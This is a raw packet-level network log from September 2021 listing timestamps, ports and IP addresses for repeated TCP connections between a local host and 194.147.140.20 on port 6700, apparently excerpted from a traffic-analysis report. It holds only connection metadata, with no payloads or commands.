                        Sep 14, 2021 16:18:29.816291094 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:29.816344976 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:29.816421032 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:29.816445112 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:29.816468000 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:29.816529036 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:29.816574097 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:29.846414089 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:29.930402040 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:29.933067083 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.000730038 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.000870943 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.001183033 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.001327991 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.001359940 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.001445055 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.002461910 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.002490044 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.004144907 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.007191896 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.007247925 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.008805990 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009504080 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.009506941 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009526968 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009527922 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.009531021 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.009533882 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.009536028 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.009550095 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009572029 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009593964 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009613037 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009634018 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009653091 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009674072 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009695053 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009718895 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009742022 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009764910 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009788036 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009807110 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009825945 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009844065 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009860992 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009915113 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009938955 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009958982 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009978056 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.009995937 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010013103 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010030031 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010055065 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010072947 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010093927 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010113955 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010132074 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010149002 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010166883 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010184050 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010200977 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010219097 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010241032 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010258913 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010277033 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.010294914 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.014730930 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.086214066 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.123055935 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.162497997 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.190727949 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.193732977 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.193767071 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.193872929 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.194245100 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.194434881 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.200368881 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.200439930 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.200465918 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.200522900 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.200553894 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.200611115 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.200722933 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206172943 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206206083 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206231117 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206254005 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206278086 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206295013 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.206345081 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.206650972 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206682920 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206706047 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206731081 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206754923 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206782103 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206851006 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.206877947 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.207998991 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.208838940 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.208868980 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.208890915 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.208918095 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.208941936 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.208961010 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.208964109 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.208986998 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209011078 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209033012 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209054947 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209078074 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209101915 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209125996 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209150076 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209172964 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209197044 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209220886 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209233999 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.209242105 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.209336996 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.210650921 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210685968 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210709095 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210737944 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210763931 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210788012 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210812092 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210835934 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210860014 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.210860014 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.210922956 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.352334023 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.352395058 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.352478981 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.383816004 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.383913040 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.384088993 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.384136915 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.384161949 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.384243011 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.384273052 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.384377003 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.384458065 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.384584904 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.384644985 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.384829044 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.390376091 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.390408039 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.390489101 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.399727106 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.399765015 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.399789095 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.399842978 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.399864912 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.399898052 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.399935007 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400015116 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400039911 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400058985 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400058985 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400085926 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400089025 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400111914 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400135040 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400156975 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400157928 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400181055 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400203943 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400203943 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400228024 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400249958 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400250912 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400305033 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400327921 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400332928 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400352955 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400352955 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400376081 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400402069 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400425911 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400433064 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400448084 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400470972 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400474072 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400495052 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400516987 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400517941 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400542021 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400552034 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400576115 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400599003 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400625944 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400676966 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400702000 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400706053 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400723934 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.400748014 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.400748014 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401004076 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401041985 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.401209116 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401326895 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401351929 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401360989 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.401434898 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.401473999 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401671886 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401685953 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.401803017 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401827097 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401957989 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401981115 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.401985884 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.402038097 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.402121067 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.402144909 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.402214050 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.402267933 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.402491093 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.402501106 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.402528048 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.402707100 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.402965069 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.404263973 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.404398918 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:30.404629946 CEST670049791194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:30.459243059 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:31.008656025 CEST497916700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:35.984772921 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:36.174618959 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:36.175983906 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:36.197805882 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:36.420866013 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:36.421478987 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:36.611749887 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:36.643815994 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:36.883063078 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:36.897857904 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:37.011959076 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:37.069204092 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:37.088758945 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:37.131608963 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:37.259888887 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:37.303507090 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:37.723110914 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:37.961220980 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:37.961364031 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:38.151444912 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:38.151614904 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:38.341223955 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:38.360769987 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:38.613533974 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:38.613656044 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:38.866648912 CEST670049792194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:39.071676016 CEST497926700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:43.324764967 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:43.518209934 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:43.528770924 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:43.528810978 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:43.730647087 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:43.736118078 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:43.932821989 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:43.968025923 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:44.210021019 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:44.210221052 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:44.350766897 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:44.398025990 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:44.399754047 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:44.399923086 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:44.590862036 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:44.632375002 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:44.644655943 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:44.644793034 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:44.835144997 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:44.835252047 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:45.024904966 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:45.069825888 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:45.107444048 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:45.347999096 CEST670049793194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:46.092756987 CEST497936700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:50.201756001 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:50.395694017 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:50.395940065 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:50.397813082 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:50.603405952 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:50.616313934 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:50.807244062 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:50.810578108 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:51.061733961 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:51.134252071 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:51.206521034 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:51.257946968 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:51.324805021 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:51.325433016 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:51.447712898 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:51.492239952 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:51.577656031 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:51.577809095 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:51.776963949 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:51.777100086 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:51.966911077 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:52.007966995 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:52.134092093 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:52.374874115 CEST670049794194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:53.135773897 CEST497946700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:57.347409010 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:57.537307978 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:57.537559986 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:57.538713932 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:57.742281914 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:57.744008064 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:57.934052944 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:57.936789989 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:58.172199965 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:58.229374886 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:58.317703009 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:58.368071079 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:58.421391010 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:58.421636105 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:58.557641983 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:58.602252960 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:58.680084944 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:58.680208921 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:58.871829033 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:58.914787054 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:59.104387045 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:18:59.149909973 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:59.237837076 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:18:59.471954107 CEST670049799194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:00.275958061 CEST497996700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:04.458693981 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:04.648920059 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:04.649152040 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:04.650543928 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:04.858228922 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:04.858668089 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:05.048305988 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:05.070694923 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:05.315758944 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:05.319574118 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:05.567491055 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:05.708272934 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:05.759169102 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:05.823525906 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:05.949405909 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:05.993521929 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:06.068733931 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:06.068891048 CEST498006700192.168.2.5194.147.140.20
